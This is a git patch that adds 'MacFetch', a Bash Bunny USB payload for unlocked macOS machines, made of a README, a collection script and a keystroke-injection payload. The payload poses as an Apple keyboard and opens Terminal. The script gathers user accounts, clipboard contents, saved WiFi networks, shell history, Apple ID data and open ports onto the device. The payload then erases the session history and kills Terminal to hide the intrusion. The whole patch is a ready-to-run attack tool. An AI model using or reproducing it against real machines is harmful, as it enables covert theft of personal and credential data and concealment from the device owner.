From bb1f296d81573163f29df4712f7ff86678fab286 Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Fri, 12 May 2023 18:07:30 +0200 Subject: [PATCH] Add MacFetch (#582) * Add MacFetch * Fix status table * Complete status LEDs --- payloads/library/recon/MacFetch/README.md | 37 +++++++ payloads/library/recon/MacFetch/fetch.sh | 115 ++++++++++++++++++++ payloads/library/recon/MacFetch/payload.txt | 63 +++++++++++ 3 files changed, 215 insertions(+) create mode 100644 payloads/library/recon/MacFetch/README.md create mode 100644 payloads/library/recon/MacFetch/fetch.sh create mode 100644 payloads/library/recon/MacFetch/payload.txt diff --git a/payloads/library/recon/MacFetch/README.md b/payloads/library/recon/MacFetch/README.md new file mode 100644 index 00000000..e56a8cf9 --- /dev/null +++ b/payloads/library/recon/MacFetch/README.md @@ -0,0 +1,37 @@ +# MacFetch +* Author: 90N45 +* Version: 1.0 +* Target: Mac +* Attackmodes: HID, STORAGE + +### Description +Get a bunch of delicious data from unlocked macOS devices. + +### Saving the following Data: +- Current User +- All Users +- Hostname +- WiFi Interface +- Current WiFi Connection State +- Preferred WiFi Networks (Perfect for WiFi Pineapple’s SSID pool) +- Known Bluetooth Devices +- Clipboard +- Public IP +- Open Network Ports +- Applications +- Applications Starting at System Boot/Login +- Software and Hardware Information +- Terminal History +- Login History +- Apple ID Information +- Ifconfig output + +### Status +| LED | State | +| --- | --- | +| Magenta solid (SETUP) | Set ATTACKMODE and get SWITCH_POSITION | +| Yellow single blink (ATTACK) | Ongoing information collection | +| White fast blink (CLEANUP) | Erase the footprint and clean up | +| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished | + +*Average runtime: 25 seconds* diff --git a/payloads/library/recon/MacFetch/fetch.sh b/payloads/library/recon/MacFetch/fetch.sh new file mode 100644 index 00000000..88842660 --- /dev/null +++ b/payloads/library/recon/MacFetch/fetch.sh @@ -0,0 +1,115 @@ +#! /bin/bash + +# Read useful data +clear +echo "[ ] 0%" +date=$(date "+%Y-%m-%d-%H-%M") +clear +echo "[# ] 5%" +user=$(whoami) +clear +echo "[## ] 10%" +users=$(dscacheutil -q user | grep -A 3 -B 2 -e uid:\ 5'[0-9][0-9]') +clear +echo "[### ] 15%" +host=$(hostname) +clear +echo "[#### ] 20%" +wifi_interface=$(networksetup -listallhardwareports | grep Wi-Fi -A 1 | tail -1 | sed 's/.* //') +clear +echo "[##### ] 25%" +current_wifi=$(airport --getinfo) +clear +echo "[###### ] 30%" +preffered_wifi=$(networksetup -listpreferredwirelessnetworks ${wifi_interface}) +clear +echo "[####### ] 35%" +bt_devices=$(system_profiler SPBluetoothDataType) +clear +echo "[######## ] 40%" +clipboard=$(osascript -e 'the clipboard') +clear +echo "[######### ] 45%" +public_ip=$(curl ipinfo.io/ip) +clear +echo "[########### ] 55%" +ports=$(lsof -Pn -i4 | grep LISTEN) +clear +echo "[########### ] 60%" +apps=$(ls /Applications) +clear +echo "[############ ] 65%" +login_apps=$(osascript -e 'tell application "System Events" to get the name of every login item') +clear +echo "[############ ] 70%" +term_history=$(cat -n ~/.zsh_history | tail -15) +clear +echo "[############ ] 75%" +login=$(last | head -60) +clear +echo "[############# ] 80%" +appleid=$(defaults read MobileMeAccounts Accounts) +clear +echo "[############## ] 85%" +ware_info=$(system_profiler SPSoftwareDataType SPHardwareDataType) +clear +echo "[############### ] 90%" +ifaceconf=$(ifconfig) +clear +echo "[################ ] 95%" + +# Write useful data +cat << EOF > /Volumes/BashBunny/loot/MacFetch-${date}.log +--- CURRENT USER --- +${user} + +--- ALL USERS --- +${users} + +--- HOST --- +${host} + +--- WIFI INTERFACE --- +${wifi_interface} + +--- CURRENT WIFI --- +${current_wifi} + +--- PREFERRED WIFI NETWORKS --- +${preffered_wifi} + +--- KNOWN BLUETOOTH DEVICES --- +${bt_devices} + +--- CLIPBOARD --- +${clipboard} + +--- PUBLIC IP --- +${public_ip} + +--- OPEN NETWORK PORTS --- +${ports} + +--- APPLICATIONS --- +${apps} + +--- APPLICATIONS STARTING AT SYSTEM START --- +${login_apps} + +--- SOFT-, HARDWARE INFO --- +${ware_info} + +--- TERMINAL HISTORY --- +${term_history} + +--- LOGIN HISTORY --- +${login} + +--- APPLE ID INFO --- +${appleid} + +--- IFCONFIG --- +${ifaceconf} +EOF +clear +echo "[####################] 100%" \ No newline at end of file diff --git a/payloads/library/recon/MacFetch/payload.txt b/payloads/library/recon/MacFetch/payload.txt new file mode 100644 index 00000000..ded864ee --- /dev/null +++ b/payloads/library/recon/MacFetch/payload.txt @@ -0,0 +1,63 @@ +#!/bin/bash +# +# Title: MacFetch +# Description: Get a bunch of delicious data from unlocked macOS devices. +# Author: 90N45 +# Version: 1.0 +# Category: Recon +# Attackmodes: HID, STORAGE +# +# Saving the following Data: +# - Current User +# - All Users +# - Hostname +# - WiFi Interface +# - Current WiFi Connection State +# - Preferred WiFi Networks +# - Known Bluetooth Devices +# - Clipboard +# - Public IP +# - Open Network Ports +# - Applications +# - Applications Starting at System Boot/Login +# - Software and Hardware Information +# - Terminal History +# - Login History +# - Apple ID Information +# - Ifconfig output + +LED SETUP +ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE +GET SWITCH_POSITION + +LED ATTACK +# Open terminal +QUACK GUI SPACE +QUACK DELAY 1000 +QUACK STRING terminal +QUACK ENTER +QUACK DELAY 1500 + +# Run fetch.sh script from BB (faster than writing all commands via HID) +QUACK STRING "chmod +x /Volumes/BashBunny/payloads/${SWITCH_POSITION}/fetch.sh && bash /Volumes/BashBunny/payloads/${SWITCH_POSITION}/fetch.sh" +QUACK ENTER + +QUACK DELAY 3000 + +LED CLEANUP +# Delete bash variables +QUACK STRING unset date user users host wifi_interface current_wifi preffered_wifi bt_devices clipboard public_ip ports apps login_apps ware_info term_history login appleid ifaceconf +QUACK ENTER +# Eject BB storage +QUACK STRING diskutil eject /Volumes/BashBunny/ +QUACK ENTER +# Remove terminal history from current session (commands used in attack won't be visible with the history command) +QUACK STRING "rm -r ~/.zsh_sessions" +QUACK ENTER +# Exit terminal +QUACK STRING killall Terminal +QUACK ENTER + +sync + +LED FINISH \ No newline at end of file